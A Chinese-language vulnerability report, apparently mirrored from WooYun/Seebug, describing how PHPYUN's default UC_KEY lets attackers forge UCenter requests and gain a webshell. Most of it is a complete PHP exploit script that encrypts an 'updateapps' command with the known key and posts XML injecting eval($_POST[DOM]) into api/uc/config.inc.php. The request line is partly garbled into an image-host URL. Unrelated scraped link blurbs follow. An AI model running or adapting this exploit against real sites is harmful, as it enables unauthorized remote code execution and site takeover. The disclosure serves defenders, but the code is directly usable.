getshell.php,PHPYUN设计缺陷导致轻易Getshell
### 简要描述:
PHPYUN设计缺陷导致轻易Getshell
### 详细说明:
#1 设计缺陷
phpyun集成了部分ucenter功能,引入了UC_KEY,且默认设置为"phpyun123456"
```
define("UC_KEY","phpyun123456");
```
你们难道不知道UC_KEY这个值的威力的多大?好吧 我就当你们不知道,详情请见
```
[WooYun: Discuz的利用UC_KEY进行getshell](http://www.wooyun.org/bugs/wooyun-2014-048137)
```
```
http://www.2cto.com/Article/201401/272274.html
```
#2 利用UC_KEY实现Getshell
```
// 代码版权归原作者所有!
$timestamp = time()+10*3600;
$host="www.vulns.org";
$uc_key="phpyun123456";
$code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key));
$cmd1='<?xml version="1.0" encoding="ISO-8859-1"?>
http://x\');eval($_POST[DOM]);//
';
$cmd2='<?xml version="1.0" encoding="ISO-8859-1"?>
http://x
';
$html1 = send($cmd1);
echo $html1;
$html2 = send($cmd2);
echo $html2;
function send($cmd){
global $host,$code;
$message = "POST https://images.seebug.org/upload/api/uc/uc.php?code=".$code." HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Referer: ".$host."\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "Host: ".$host."\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;
//var_dump($message);
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
$ckey_length = 4;
$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = '';
$box = range(0, 255);
$rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($operation == 'DECODE') {
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
} else {
return $keyc.str_replace('=', '', base64_encode($result));
}
}
?>
```
运行上面的代码
[](https://images.seebug.org/upload/201401/22121424d3d53688761b06819094dbfe6d038b3a.jpg)
即可往 api/uc/config.inc.php 写入恶意的代码
[](https://images.seebug.org/upload/201401/2212214678cb6a06ebf5d0b0ae084db261d6c86f.jpg)
### 漏洞证明:
# SO...
[](https://images.seebug.org/upload/201401/22122058427eb6148f8488c66ae18c0909b6479f.jpg)
getshell.php,PHPYUN设计缺陷导致轻易Getshell相关推荐
- 特斯拉Model 3设计缺陷导致底盘经常堆积厚厚泥沙
[摘要]在汽车底盘中发现大量的泥土和沙子并不常见.好在这些泥沙只堆积在底盘的铝板上,因此不会产生腐蚀作用. 腾讯科技讯 据外媒报道,特斯拉Model 3车主发现这辆车的底盘似乎有一个设计缺陷,在寒冷的 ...
- shiro 不过滤指定的带参数url_原创干货 | 过滤器设计缺陷导致权限绕过
点击关注了解更多精彩内容!! 权限控制的本质 一般来说,为了防止越权操作,通常会结合filter进行相关接口的鉴权操作.其中不外乎就是对每一个接口(通俗来说就是我们的URI/URL)进行业务梳理,然后 ...
- java 权限url权限_filter设计缺陷导致的权限绕过
1.1 权限控制的本质 一般来说,为了防止越权操作,通常会结合filter进⾏相关接⼝的鉴权操作.其中不不外乎就是对每⼀个接口(通俗来说就是我们的URI/URL)进行业务梳理,然后判断当前URI/UR ...
- Redis 未授权访问缺陷可轻易导致系统被黑
Redis 未授权访问缺陷可轻易导致系统被黑 漏洞概要 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将Redis服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在 ...
- Typecho反序列化导致前台 getshell 漏洞复现
Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...
- 苹果iBook笔记本曝设计缺陷 使用中突然断电
苹果iBook笔记本曝设计缺陷 使用中突然断电[@more@][赛迪网讯]5月7日消息,据国外媒体报道,丹麦消费者投诉委员会(DCCB)日前表示,苹果iBook G4笔记本电脑存在设计缺陷,可能导致突 ...
- 从光大证券的软件设计缺陷想到的。[转自:banq]
为什么80%的码农都做不了架构师?>>> 8月16中国股市出现名震历史的乌龙事件,导致该事件的原因今天被证监会调查后,确定是软件系统的设计问题: 光大证券自营的策略交易系统存在 ...
- 优酷网持久xss、设计缺陷、用户权限越权
漏洞详情 披露状态: 2010-07-29: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 19 ...
- PMCAFF | 十大最坑爹的产品设计缺陷你遇到过几个?
出品 | PMCAFF产品经理社区 问题背景:你遇到过的最坑爹的产品设计缺陷有哪些?受过伤的都来聊聊,并且提出改进方案. 以下是来自@郑健的回答: 我想好好回答这个题目,对的,我就是来吐槽的. 1.知 ...
最新文章
- QIIME 2用户文档. 13数据评估和质控Evaluating and controlling(2018.11)
- JQuery整体简化学习
- php学习_与mysql的连接 2013.01.04
- mysql超大表处理方式是_第29问:MySQL 的复制心跳说它不想跳了
- as3 crypto 加密解密des,rsa
- Attention Model详解
- 在Android中实现一个简易的Http服务器
- 是谁断送了网络工程师的前途
- SPI读写串行FLASH(W25Q64)
- 爬取豆瓣网新书传递信息,关系型数据库的储存
- 小心哟!你很可能被“杏仁体”劫持了
- c语言编程if语句的用法,if句子用法(C语言中,if语句的用法)
- 隐马尔可夫--大内密探HMM围捕赌场老千
- 5W1H1V分析法帮你快速了解产品
- 《C和指针》阅读笔记
- mysql api update耗时_【P6级经典面试题】update SQL在MySQL的内部生命历程是怎样的?...
- 触屏型测控电路:串口助手网络ping包 带笔划输入法 硬件终结版
- 微信群管理软件哪个好?
- mysql、mariadb下载
- 上海内推 | 商汤科技招聘计算视觉算法实习生
热门文章
- SAP 初学者适合看哪些书
- 【IVI】1. Android Automotive OS 安卓车载操作系统白皮书
- 歌谣学前端之react笔记之学习之类组件
- 国外优秀搜索引擎介绍(英文搜索四当家)
- 计算两个向量的互信息(Mutual Information) matlab程序
- 网上投票作弊的技术实现(纯技术交流,勿用作他途!!)
- python风格变换图片_图片风格转换--深度学习介绍
- 微信小程序个人开发全过程
- KALI LINUX2021环境下使用sqlmap进行DVWA中的sql注入(安全等级LOW)
- 医疗时鲜资讯:自由执业能否给电子病历、影像中心 “云端化” 带来机遇?